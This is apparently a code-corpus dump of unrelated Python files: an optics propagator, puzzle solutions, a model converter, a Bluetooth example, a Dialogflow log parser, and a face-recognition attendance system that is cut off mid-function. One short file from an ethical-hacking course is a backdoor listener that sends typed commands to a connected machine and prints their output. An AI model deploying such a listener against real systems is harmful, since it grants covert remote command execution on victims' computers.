# propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and give some problems
import numpy
from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D
from wofry.propagator.propagator import Propagator2D
# TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization)
class Integral2D(Propagator2D):
HANDLER_NAME = "INTEGRAL_2D"
def get_handler_name(self):
return self.HANDLER_NAME
def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index)
def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation( wavefront, propagation_distance, parameters, element_index=element_index)
"""
2D Fresnel-Kirchhoff propagator via simplified integral
NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics
Therefore, it is not recommended to use.
:param wavefront:
:param propagation_distance: propagation distance
:param shuffle_interval: it is known that this method replicates the central diffraction spot
The distace of the replica is proportional to 1/pixelsize
To avoid that, it is possible to change a bit (randomly) the coordinates
of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical
value can be 1e5.
The result shows a diffraction pattern without replica but with much noise.
:param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the
full image with the other pixels to zero. This is useful when calculating large arrays,
so it is set as the default.
:return: a new 2D wavefront object with propagated wavefront
"""
def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None):
shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index)
calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index)
return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval,
calculate_grid_only=calculate_grid_only)
@classmethod
def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True):
#
# Fresnel-Kirchhoff integral (neglecting inclination factor)
#
if not calculate_grid_only:
#
# calculation over the whole detector area
#
p_x = wavefront.get_coordinate_x()
p_y = wavefront.get_coordinate_y()
wavelength = wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
det_x = p_x.copy()
det_y = p_y.copy()
p_X = wavefront.get_mesh_x()
p_Y = wavefront.get_mesh_y()
det_X = p_X
det_Y = p_Y
amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex')
wavenumber = 2 * numpy.pi / wavelength
for i in range(det_x.size):
for j in range(det_y.size):
if not shuffle_interval:
rd_x = 0.0
rd_y = 0.0
else:
rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) +
numpy.power(p_Y + rd_y - det_Y[i,j],2) +
numpy.power(propagation_distance,2) )
amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated)
else:
x = wavefront.get_coordinate_x()
y = wavefront.get_coordinate_y()
X = wavefront.get_mesh_x()
Y = wavefront.get_mesh_y()
wavenumber = 2 * numpy.pi / wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1))
indices_x = wavefront.get_mesh_indices_x()
indices_y = wavefront.get_mesh_indices_y()
indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten()
indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten()
X_flatten = X[numpy.where(used_indices == 1)].flatten()
Y_flatten = Y[numpy.where(used_indices == 1)].flatten()
complex_amplitude_propagated = amplitude*0
print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%(
X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1]))
for i in range(X_flatten.size):
r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) +
numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) +
numpy.power(propagation_distance,2) )
complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x,
y_array=y,
z_array=complex_amplitude_propagated,
wavelength=wavefront.get_wavelength())
# added <EMAIL> 2018-03-23 to conserve energy - TODO: review method!
output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() /
output_wavefront.get_intensity().sum()))
return output_wavefront
| 2.875 | 3 |
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py | andor2718/LeetCode | 1 | 7871 | <filename>Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
# https://leetcode.com/problems/delete-and-earn/
class Solution:
def deleteAndEarn(self, nums: list[int]) -> int:
num_profits = dict()
for num in nums:
num_profits[num] = num_profits.get(num, 0) + num
sorted_nums = sorted(num_profits.keys())
second_last_profit = 0
last_profit = num_profits[sorted_nums[0]]
for idx in range(1, len(sorted_nums)):
profit_with_curr_num = num_profits[sorted_nums[idx]]
if sorted_nums[idx - 1] == sorted_nums[idx] - 1:
curr_profit = max(last_profit,
second_last_profit + profit_with_curr_num)
else:
curr_profit = last_profit + profit_with_curr_num
second_last_profit, last_profit = last_profit, curr_profit
return last_profit
| 3.375 | 3 |
Desafio051.py | GabrielSanchesRosa/Python | 0 | 7872 | <gh_stars>0
# Desenvolva um programa que leia o primeiro termo e a razão de uma PA. No final mostre, os 10 primeiros termos dessa prograssão.
primeiro = int(input("Primeiro Termo: "))
razao = int(input("Razão: "))
decimo = primeiro + (10 - 1) * razao
for c in range(primeiro, decimo + razao, razao):
print(f"{c}", end=" -> ")
print("Acabou")
| 3.953125 | 4 |
tiddlyweb/filters/limit.py | tiddlyweb/tiddlyweb | 57 | 7873 | """
A :py:mod:`filter <tiddlyweb.filters>` type to limit a group of entities
using a syntax similar to SQL Limit::
limit=<index>,<count>
limit=<count>
"""
import itertools
def limit_parse(count='0'):
"""
Parse the argument of a ``limit`` :py:mod:`filter <tiddlyweb.filters>`
for a count and index argument, return a function which does the limiting.
Exceptions while parsing are passed up the stack.
"""
index = '0'
if ',' in count:
index, count = count.split(',', 1)
index = int(index)
count = int(count)
def limiter(entities, indexable=False, environ=None):
return limit(entities, index=index, count=count)
return limiter
def limit(entities, count=0, index=0):
"""
Make a slice of a list of entities based on a count and index.
"""
return itertools.islice(entities, index, index + count)
| 3.328125 | 3 |
pytorch_keras_converter/API.py | sonibla/pytorch_keras_converter | 17 | 7874 | """
Simple API to convert models between PyTorch and Keras
(Conversions from Keras to PyTorch aren't implemented)
"""
from . import utility
from . import tests
from . import io_utils as utils
import tensorflow
def convert(model,
input_shape,
weights=True,
quiet=True,
ignore_tests=False,
input_range=None,
save=None,
filename=None,
directory=None):
"""
Conversion between PyTorch and Keras
(Conversions from Keras to PyTorch aren't implemented)
Arguments:
-model:
A Keras or PyTorch model or layer to convert
-input_shape:
Input shape (list, tuple or int), without batchsize.
-weights (bool):
Also convert weights. If set to false, only convert model
architecture
-quiet (bool):
If a progress bar and some messages should appear
-ignore_tests (bool):
If tests should be ignored.
If set to True, converted model will
still be tested by security. If models are not identical, it will
only print a warning.
If set to False, and models are not identical, RuntimeWarning will
be raised
If weights is False, tests are automatically ignored
-input_range:
Optionnal.
A list of 2 elements containing max and min values to give as
input to the model when performing the tests. If None, models will
be tested on samples from the "standard normal" distribution.
-save:
If model should be exported to a hdf5 file.
-filename:
Filename to give to model's hdf5 file. If filename is not None and
save is not False, then save will automatically be set to True
-directory:
Where to save model's hdf5 file. If directory is not None and
save is not False, then save will automatically be set to True
Raises:
-RuntimeWarning:
If converted and original model aren't identical, and ignore_tests
is False
Returns:
If model has been exported to a file, it will return the name of the
file
Else, it returns the converted model
"""
if (filename is not None or directory is not None) and save is None:
save = True
if save is None:
save = False
if weights == False:
ignore_tests = True
if not quiet:
print('\nConversion...')
# Converting:
newModel = utility.convert(model=utility.LayerRepresentation(model),
input_size=input_shape,
weights=weights,
quiet=quiet)
# Actually, newModel is a LayerRepresentation object
# Equivalents:
torchModel = newModel.equivalent['torch']
kerasModel = newModel.equivalent['keras']
if not quiet:
print('Automatically testing converted model reliability...\n')
# Checking converted model reliability
tested = False
try:
meanSquaredError = tests.comparison(model1=torchModel,
model2=kerasModel,
input_shape=input_shape,
input_range=input_range,
quiet=quiet)
tested = True
except tensorflow.errors.InvalidArgumentError:
print("Warning: tests unavailable!")
if tested and meanSquaredError > 0.0001:
if ignore_tests:
print("Warning: converted and original models aren't identical !\
(mean squared error: {})".format(meanSquaredError))
else:
raise RuntimeWarning("Original and converted model do not match !\
\nOn random input data, outputs showed a mean squared error of {} (if should \
be below 1e-10)".format(meanSquaredError))
elif not quiet and tested:
print('\n Original and converted models match !\nMean squared err\
or : {}'.format(meanSquaredError))
if save:
if not quiet:
print('Saving model...')
defaultName = 'conversion_{}'.format(newModel.name)
if filename is None:
filename = defaultName
# Formatting filename so that we don't overwrite any existing file
file = utils.formatFilename(filename,
directory)
# Freezing Keras model (trainable = False everywhere)
utils.freeze(kerasModel)
# Save the entire model
kerasModel.save(file + '.h5')
if not quiet:
print('Done !')
return file + '.h5'
if not quiet:
print('Done !')
return kerasModel
def convert_and_save(model,
input_shape,
weights=True,
quiet=True,
ignore_tests=False,
input_range=None,
filename=None,
directory=None):
"""
Conversion between PyTorch and Keras, and automatic save
(Conversions from Keras to PyTorch aren't implemented)
Arguments:
-model:
A Keras or PyTorch model or layer to convert
-input_shape:
Input shape (list, tuple or int), without batchsize.
-weights (bool):
Also convert weights. If set to false, only convert model
architecture
-quiet (bool):
If a progress bar and some messages should appear
-ignore_tests (bool):
If tests should be ignored.
If set to True, converted model will
still be tested by security. If models are not identical, it will
only print a warning.
If set to False, and models are not identical, RuntimeWarning will
be raised
If weights is False, tests are automatically ignored
-input_range:
Optionnal.
A list of 2 elements containing max and min values to give as
input to the model when performing the tests. If None, models will
be tested on samples from the "standard normal" distribution.
-filename:
Filename to give to model's hdf5 file. If filename is not None and
save is not False, then save will automatically be set to True
-directory:
Where to save model's hdf5 file. If directory is not None and
save is not False, then save will automatically be set to True
Returns:
Name of created hdf5 file
"""
return convert(model=model,
input_shape=input_shape,
weights=weights,
quiet=quiet,
ignore_tests=ignore_tests,
input_range=input_range,
save=True,
filename=filename,
directory=directory)
| 3.53125 | 4 |
examples/enable_notifications.py | kjwill/bleak | 0 | 7875 | # -*- coding: utf-8 -*-
"""
Notifications
-------------
Example showing how to add notifications to a characteristic and handle the responses.
Updated on 2019-07-03 by hbldh <<EMAIL>>
"""
import sys
import logging
import asyncio
import platform
from bleak import BleakClient
from bleak import _logger as logger
CHARACTERISTIC_UUID = "f000aa65-0451-4000-b000-000000000000" # <--- Change to the characteristic you want to enable notifications from.
ADDRESS = (
"24:71:89:cc:09:05" # <--- Change to your device's address here if you are using Windows or Linux
if platform.system() != "Darwin"
else "B9EA5233-37EF-4DD6-87A8-2A875E821C46" # <--- Change to your device's address here if you are using macOS
)
if len(sys.argv) == 3:
ADDRESS = sys.argv[1]
CHARACTERISTIC_UUID = sys.argv[2]
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
print("{0}: {1}".format(sender, data))
async def run(address, debug=False):
if debug:
import sys
l = logging.getLogger("asyncio")
l.setLevel(logging.DEBUG)
h = logging.StreamHandler(sys.stdout)
h.setLevel(logging.DEBUG)
l.addHandler(h)
logger.addHandler(h)
async with BleakClient(address) as client:
logger.info(f"Connected: {client.is_connected}")
await client.start_notify(CHARACTERISTIC_UUID, notification_handler)
await asyncio.sleep(5.0)
await client.stop_notify(CHARACTERISTIC_UUID)
if __name__ == "__main__":
import os
os.environ["PYTHONASYNCIODEBUG"] = str(1)
loop = asyncio.get_event_loop()
# loop.set_debug(True)
loop.run_until_complete(run(ADDRESS, True))
| 2.90625 | 3 |
pyrules/storages/base.py | miraculixx/pyrules | 17 | 7876 | <reponame>miraculixx/pyrules<gh_stars>10-100
class BaseStorage(object):
def get_rule(self, name):
raise NotImplementedError()
def get_ruleset(self, name):
raise NotImplementedError()
| 1.8125 | 2 |
src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | 0 | 7877 | <filename>src/15 listener_and_backdoor/listener_2.py<gh_stars>0
#!/usr/bin/python
import socket
class Listener:
def __init__(self,ip,port):
listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
#options to reuse sockets
#listener.bind(("localhost",1234))
listener.bind((ip,port))
listener.listen(0)
print "[+] Waiting for Incoming Connection"
#listen for connecion backlog is set to 0 don't need to wory about 0
self.connection,address = listener.accept()
print "[+] Got a Connection from " + str(address)
def execute_remotely(self,command):
self.connection.send(command)
return self.connection.recv(1024)
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print result
my_listener = Listener("localhost",1234)
my_listener.run() | 2.953125 | 3 |
dialogflow/history2xls.py | ray-hrst/temi-tools | 1 | 7878 | <filename>dialogflow/history2xls.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Convert Dialogflow history to spreadsheet
User must manually copy the history from the browser and save this in a text file.
This reads the textfile, parses the data, and saves it to a spreadsheet.
Example training sample:
USER
サワディカ
Nov 4, 11:19 PM
AGENT
No matched intent
Nov 4, 11:19 PM
more_vert
"""
import argparse
import os
from simple_report import SimpleReport
# constants
FIELDS = ["Date", "User", "Agent"]
if __name__ == "__main__":
# collect arguments
PARSER = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
PARSER.add_argument("filename", help="History text file")
ARGS = PARSER.parse_args()
# generate report
filename, file_extension = os.path.splitext(ARGS.filename)
REPORT = SimpleReport(filename, FIELDS)
# step each line of history text file
with open(ARGS.filename, 'r') as fp:
num_lines = sum(1 for line in open(ARGS.filename))
rows = int(num_lines / 7)
print("Reading {} lines of text.".format(num_lines))
print("Writing {} rows.".format(rows))
for row in range(1, rows):
user_utterance = fp.readline().strip() # USER UTTERANCE
date = fp.readline().strip() # DATE
agent_intent = fp.readline().strip() # AGENT INTENT
date = fp.readline().strip() # DATE
_ = fp.readline().strip() # 'more_vert'
utterance = user_utterance.split("USER", 1)[1]
intent = agent_intent.split("AGENT", 1)[1]
if not intent:
intent = "Intent found"
print("[{}] {} {} {}".format(row, date, utterance, intent))
# add row to report
REPORT.add("Date", row, date, date)
REPORT.add("User", row, utterance)
REPORT.add("Agent", row, intent)
REPORT.close()
| 3.515625 | 4 |
recognition/views.py | usathe71-u/Attendance-System-Face-Recognition | 3 | 7879 | from django.shortcuts import render,redirect
from .forms import usernameForm,DateForm,UsernameAndDateForm, DateForm_2
from django.contrib import messages
from django.contrib.auth.models import User
import cv2
import dlib
import imutils
from imutils import face_utils
from imutils.video import VideoStream
from imutils.face_utils import rect_to_bb
from imutils.face_utils import FaceAligner
import time
from attendance_system_facial_recognition.settings import BASE_DIR
import os
import face_recognition
from face_recognition.face_recognition_cli import image_files_in_folder
import pickle
from sklearn.preprocessing import LabelEncoder
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
import numpy as np
from django.contrib.auth.decorators import login_required
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import datetime
from django_pandas.io import read_frame
from users.models import Present, Time
import seaborn as sns
import pandas as pd
from django.db.models import Count
#import mpld3
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
from matplotlib import rcParams
import math
mpl.use('Agg')
#utility functions:
def username_present(username):
if User.objects.filter(username=username).exists():
return True
return False
def create_dataset(username):
id = username
if(os.path.exists('face_recognition_data/training_dataset/{}/'.format(id))==False):
os.makedirs('face_recognition_data/training_dataset/{}/'.format(id))
directory='face_recognition_data/training_dataset/{}/'.format(id)
# Detect face
#Loading the HOG face detector and the shape predictpr for allignment
print("[INFO] Loading the facial detector")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
fa = FaceAligner(predictor , desiredFaceWidth = 96)
#capture images from the webcam and process and detect the face
# Initialize the video stream
print("[INFO] Initializing Video stream")
vs = VideoStream(src=0).start()
#time.sleep(2.0) ####CHECK######
# Our identifier
# We will put the id here and we will store the id with a face, so that later we can identify whose face it is
# Our dataset naming counter
sampleNum = 0
# Capturing the faces one by one and detect the faces and showing it on the window
while(True):
# Capturing the image
#vs.read each frame
frame = vs.read()
#Resize each image
frame = imutils.resize(frame ,width = 800)
#the returned img is a colored image but for the classifier to work we need a greyscale image
#to convert
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#To store the faces
#This will detect all the images in the current frame, and it will return the coordinates of the faces
#Takes in image and some other parameter for accurate result
faces = detector(gray_frame,0)
#In above 'faces' variable there can be multiple faces so we have to get each and every face and draw a rectangle around it.
for face in faces:
print("inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
# Whenever the program captures the face, we will write that is a folder
# Before capturing the face, we need to tell the script whose face it is
# For that we will need an identifier, here we call it id
# So now we captured a face, we need to write it in a file
sampleNum = sampleNum+1
# Saving the image dataset, but only the face part, cropping the rest
if face is None:
print("face is none")
continue
cv2.imwrite(directory+'/'+str(sampleNum)+'.jpg' , face_aligned)
face_aligned = imutils.resize(face_aligned ,width = 400)
#cv2.imshow("Image Captured",face_aligned)
# @params the initial point of the rectangle will be x,y and
# @params end point will be x+width and y+height
# @params along with color of the rectangle
# @params thickness of the rectangle
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Add Images",frame)
#Before closing it we need to give a wait command, otherwise the open cv wont work
# @params with the millisecond of delay 1
cv2.waitKey(1)
#To get out of the loop
if(sampleNum>300):
break
#Stoping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
def predict(face_aligned,svc,threshold=0.7):
face_encodings=np.zeros((1,128))
try:
x_face_locations=face_recognition.face_locations(face_aligned)
faces_encodings=face_recognition.face_encodings(face_aligned,known_face_locations=x_face_locations)
if(len(faces_encodings)==0):
return ([-1],[0])
except:
return ([-1],[0])
prob=svc.predict_proba(faces_encodings)
result=np.where(prob[0]==np.amax(prob[0]))
if(prob[0][result[0]]<=threshold):
return ([-1],prob[0][result[0]])
return (result[0],prob[0][result[0]])
def vizualize_Data(embedded, targets,):
X_embedded = TSNE(n_components=2).fit_transform(embedded)
for i, t in enumerate(set(targets)):
idx = targets == t
plt.scatter(X_embedded[idx, 0], X_embedded[idx, 1], label=t)
plt.legend(bbox_to_anchor=(1, 1));
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
plt.savefig('./recognition/static/recognition/img/training_visualisation.png')
plt.close()
def update_attendance_in_db_in(present):
today=datetime.date.today()
time=datetime.datetime.now()
for person in present:
user=User.objects.get(username=person)
try:
qs=Present.objects.get(user=user,date=today)
except :
qs= None
if qs is None:
if present[person]==True:
a=Present(user=user,date=today,present=True)
a.save()
else:
a=Present(user=user,date=today,present=False)
a.save()
else:
if present[person]==True:
qs.present=True
qs.save(update_fields=['present'])
if present[person]==True:
a=Time(user=user,date=today,time=time, out=False)
a.save()
def update_attendance_in_db_out(present):
today=datetime.date.today()
time=datetime.datetime.now()
for person in present:
user=User.objects.get(username=person)
if present[person]==True:
a=Time(user=user,date=today,time=time, out=True)
a.save()
def check_validity_times(times_all):
if(len(times_all)>0):
sign=times_all.first().out
else:
sign=True
times_in=times_all.filter(out=False)
times_out=times_all.filter(out=True)
if(len(times_in)!=len(times_out)):
sign=True
break_hourss=0
if(sign==True):
check=False
break_hourss=0
return (check,break_hourss)
prev=True
prev_time=times_all.first().time
for obj in times_all:
curr=obj.out
if(curr==prev):
check=False
break_hourss=0
return (check,break_hourss)
if(curr==False):
curr_time=obj.time
to=curr_time
ti=prev_time
break_time=((to-ti).total_seconds())/3600
break_hourss+=break_time
else:
prev_time=obj.time
prev=curr
return (True,break_hourss)
def convert_hours_to_hours_mins(hours):
h=int(hours)
hours-=h
m=hours*60
m=math.ceil(m)
return str(str(h)+ " hrs " + str(m) + " mins")
#used
def hours_vs_date_given_employee(present_qs,time_qs,admin=True):
register_matplotlib_converters()
df_hours=[]
df_break_hours=[]
qs=present_qs
for obj in qs:
date=obj.date
times_in=time_qs.filter(date=date).filter(out=False).order_by('time')
times_out=time_qs.filter(date=date).filter(out=True).order_by('time')
times_all=time_qs.filter(date=date).order_by('time')
obj.time_in=None
obj.time_out=None
obj.hours=0
obj.break_hours=0
if (len(times_in)>0):
obj.time_in=times_in.first().time
if (len(times_out)>0):
obj.time_out=times_out.last().time
if(obj.time_in is not None and obj.time_out is not None):
ti=obj.time_in
to=obj.time_out
hours=((to-ti).total_seconds())/3600
obj.hours=hours
else:
obj.hours=0
(check,break_hourss)= check_validity_times(times_all)
if check:
obj.break_hours=break_hourss
else:
obj.break_hours=0
df_hours.append(obj.hours)
df_break_hours.append(obj.break_hours)
obj.hours=convert_hours_to_hours_mins(obj.hours)
obj.break_hours=convert_hours_to_hours_mins(obj.break_hours)
df = read_frame(qs)
df["hours"]=df_hours
df["break_hours"]=df_break_hours
print(df)
sns.barplot(data=df,x='date',y='hours')
plt.xticks(rotation='vertical')
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
if(admin):
plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_date/1.png')
plt.close()
else:
plt.savefig('./recognition/static/recognition/img/attendance_graphs/employee_login/1.png')
plt.close()
return qs
#used
def hours_vs_employee_given_date(present_qs,time_qs):
register_matplotlib_converters()
df_hours=[]
df_break_hours=[]
df_username=[]
qs=present_qs
for obj in qs:
user=obj.user
times_in=time_qs.filter(user=user).filter(out=False)
times_out=time_qs.filter(user=user).filter(out=True)
times_all=time_qs.filter(user=user)
obj.time_in=None
obj.time_out=None
obj.hours=0
obj.hours=0
if (len(times_in)>0):
obj.time_in=times_in.first().time
if (len(times_out)>0):
obj.time_out=times_out.last().time
if(obj.time_in is not None and obj.time_out is not None):
ti=obj.time_in
to=obj.time_out
hours=((to-ti).total_seconds())/3600
obj.hours=hours
else:
obj.hours=0
(check,break_hourss)= check_validity_times(times_all)
if check:
obj.break_hours=break_hourss
else:
obj.break_hours=0
df_hours.append(obj.hours)
df_username.append(user.username)
df_break_hours.append(obj.break_hours)
obj.hours=convert_hours_to_hours_mins(obj.hours)
obj.break_hours=convert_hours_to_hours_mins(obj.break_hours)
df = read_frame(qs)
df['hours']=df_hours
df['username']=df_username
df["break_hours"]=df_break_hours
sns.barplot(data=df,x='username',y='hours')
plt.xticks(rotation='vertical')
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_employee/1.png')
plt.close()
return qs
def total_number_employees():
qs=User.objects.all()
return (len(qs) -1)
# -1 to account for admin
def employees_present_today():
today=datetime.date.today()
qs=Present.objects.filter(date=today).filter(present=True)
return len(qs)
#used
def this_week_emp_count_vs_date():
today=datetime.date.today()
some_day_last_week=today-datetime.timedelta(days=7)
monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1))
monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7)
qs=Present.objects.filter(date__gte=monday_of_this_week).filter(date__lte=today)
str_dates=[]
emp_count=[]
str_dates_all=[]
emp_cnt_all=[]
cnt=0
for obj in qs:
date=obj.date
str_dates.append(str(date))
qs=Present.objects.filter(date=date).filter(present=True)
emp_count.append(len(qs))
while(cnt<5):
date=str(monday_of_this_week+datetime.timedelta(days=cnt))
cnt+=1
str_dates_all.append(date)
if(str_dates.count(date))>0:
idx=str_dates.index(date)
emp_cnt_all.append(emp_count[idx])
else:
emp_cnt_all.append(0)
df=pd.DataFrame()
df["date"]=str_dates_all
df["Number of employees"]=emp_cnt_all
sns.lineplot(data=df,x='date',y='Number of employees')
plt.savefig('./recognition/static/recognition/img/attendance_graphs/this_week/1.png')
plt.close()
#used
def last_week_emp_count_vs_date():
today=datetime.date.today()
some_day_last_week=today-datetime.timedelta(days=7)
monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1))
monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7)
qs=Present.objects.filter(date__gte=monday_of_last_week).filter(date__lt=monday_of_this_week)
str_dates=[]
emp_count=[]
str_dates_all=[]
emp_cnt_all=[]
cnt=0
for obj in qs:
date=obj.date
str_dates.append(str(date))
qs=Present.objects.filter(date=date).filter(present=True)
emp_count.append(len(qs))
while(cnt<5):
date=str(monday_of_last_week+datetime.timedelta(days=cnt))
cnt+=1
str_dates_all.append(date)
if(str_dates.count(date))>0:
idx=str_dates.index(date)
emp_cnt_all.append(emp_count[idx])
else:
emp_cnt_all.append(0)
df=pd.DataFrame()
df["date"]=str_dates_all
df["emp_count"]=emp_cnt_all
sns.lineplot(data=df,x='date',y='emp_count')
plt.savefig('./recognition/static/recognition/img/attendance_graphs/last_week/1.png')
plt.close()
# Create your views here.
def home(request):
return render(request, 'recognition/home.html')
@login_required
def dashboard(request):
if(request.user.username=='admin'):
print("admin")
return render(request, 'recognition/admin_dashboard.html')
else:
print("not admin")
return render(request,'recognition/employee_dashboard.html')
@login_required
def add_photos(request):
if request.user.username!='admin':
return redirect('not-authorised')
if request.method=='POST':
form=usernameForm(request.POST)
data = request.POST.copy()
username=data.get('username')
if username_present(username):
create_dataset(username)
messages.success(request, f'Dataset Created')
return redirect('add-photos')
else:
messages.warning(request, f'No such username found. Please register employee first.')
return redirect('dashboard')
else:
form=usernameForm()
return render(request,'recognition/add_photos.html', {'form' : form})
def mark_your_attendance(request):
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'rb') as f:
svc = pickle.load(f)
fa = FaceAligner(predictor , desiredFaceWidth = 96)
encoder=LabelEncoder()
encoder.classes_ = np.load('face_recognition_data/classes.npy')
faces_encodings = np.zeros((1,128))
no_of_faces = len(svc.predict_proba(faces_encodings)[0])
count = dict()
present = dict()
log_time = dict()
start = dict()
for i in range(no_of_faces):
count[encoder.inverse_transform([i])[0]] = 0
present[encoder.inverse_transform([i])[0]] = False
vs = VideoStream(src=0).start()
sampleNum = 0
while(True):
frame = vs.read()
frame = imutils.resize(frame ,width = 800)
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector(gray_frame,0)
for face in faces:
print("INFO : inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
(pred,prob)=predict(face_aligned,svc)
if(pred!=[-1]):
person_name=encoder.inverse_transform(np.ravel([pred]))[0]
pred=person_name
if count[pred] == 0:
start[pred] = time.time()
count[pred] = count.get(pred,0) + 1
if count[pred] == 4 and (time.time()-start[pred]) > 1.2:
count[pred] = 0
else:
#if count[pred] == 4 and (time.time()-start) <= 1.5:
present[pred] = True
log_time[pred] = datetime.datetime.now()
count[pred] = count.get(pred,0) + 1
print(pred, present[pred], count[pred])
cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
else:
person_name="unknown"
cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
#cv2.putText()
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
#cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Mark Attendance - In - Press q to exit",frame)
#Before closing it we need to give a wait command, otherwise the open cv wont work
# @params with the millisecond of delay 1
#cv2.waitKey(1)
#To get out of the loop
key=cv2.waitKey(50) & 0xFF
if(key==ord("q")):
break
#Stoping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
update_attendance_in_db_in(present)
return redirect('home')
def mark_your_attendance_out(request):
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'rb') as f:
svc = pickle.load(f)
fa = FaceAligner(predictor , desiredFaceWidth = 96)
encoder=LabelEncoder()
encoder.classes_ = np.load('face_recognition_data/classes.npy')
faces_encodings = np.zeros((1,128))
no_of_faces = len(svc.predict_proba(faces_encodings)[0])
count = dict()
present = dict()
log_time = dict()
start = dict()
for i in range(no_of_faces):
count[encoder.inverse_transform([i])[0]] = 0
present[encoder.inverse_transform([i])[0]] = False
vs = VideoStream(src=0).start()
sampleNum = 0
while(True):
frame = vs.read()
frame = imutils.resize(frame ,width = 800)
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector(gray_frame,0)
for face in faces:
print("INFO : inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
(pred,prob)=predict(face_aligned,svc)
if(pred!=[-1]):
